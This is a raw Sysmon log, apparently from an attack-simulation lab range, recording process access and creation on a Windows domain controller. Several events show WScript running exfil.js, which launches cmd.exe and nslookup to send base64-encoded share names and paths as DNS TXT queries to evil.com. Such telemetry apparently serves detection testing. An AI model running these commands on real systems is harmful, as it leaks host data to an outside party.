14:21:29.312{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208117Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.312{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-4B43-000000005F02}7672C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208116Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.312{2E1864BB-18E0-629A-6742-000000005F02}39766260C:\Windows\System32\WScript.exe{2E1864BB-18E9-629A-4B43-000000005F02}7672C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208115Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.313{2E1864BB-18E9-629A-4B43-000000005F02}7672C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlotjgqg.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000208114Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.296{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nliea.tmpMD5=1D1CCA53E4DF780302A6C1C8BFFFFD37,SHA256=3E9BA274CFCD18E7F9C724A3CED552A6AAA905F20D03820BE6FCA23A34DF3C9F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208113Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.281{2E1864BB-18E9-629A-4943-000000005F02}36365912C:\Windows\system32\conhost.exe{2E1864BB-18E9-629A-4A43-000000005F02}6372C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208112Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.281{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208111Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.281{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208110Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.281{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208109Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.281{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208108Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.281{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-4A43-000000005F02}6372C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208107Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.281{2E1864BB-18E9-629A-4843-000000005F02}3656896C:\Windows\system32\cmd.exe{2E1864BB-18E9-629A-4A43-000000005F02}6372C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208106Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.288{2E1864BB-18E9-629A-4A43-000000005F02}6372C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E9-629A-4843-000000005F02}3656C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nliea.tmp 2>&1 10341000x8000000000000000208105Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.259{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E9-629A-4943-000000005F02}3636C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208104Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.259{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E9-629A-4943-000000005F02}3636C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208103Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.259{2E1864BB-18E9-629A-4943-000000005F02}36365912C:\Windows\system32\conhost.exe{2E1864BB-18E9-629A-4843-000000005F02}3656C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208102Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.259{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-4943-000000005F02}3636C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208101Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.243{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208100Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.243{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208099Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.243{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208098Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.243{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208097Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.243{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-4843-000000005F02}3656C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208096Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.243{2E1864BB-18E0-629A-6742-000000005F02}39765200C:\Windows\System32\WScript.exe{2E1864BB-18E9-629A-4843-000000005F02}3656C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208095Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.255{2E1864BB-18E9-629A-4843-000000005F02}3656C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nliea.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000208094Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.243{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlqzwwf.tmpMD5=DF35AB54482476B9173CEB90AD028262,SHA256=D36A5C0891B34251E0B089204F7A21F9F91A19D06CA659E6438127A003B7EB57,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208093Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.228{2E1864BB-18E9-629A-4643-000000005F02}40525364C:\Windows\system32\conhost.exe{2E1864BB-18E9-629A-4743-000000005F02}3552C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208092Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.228{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208091Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.228{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208090Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.228{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208089Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.212{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208088Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.212{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-4743-000000005F02}3552C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208087Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 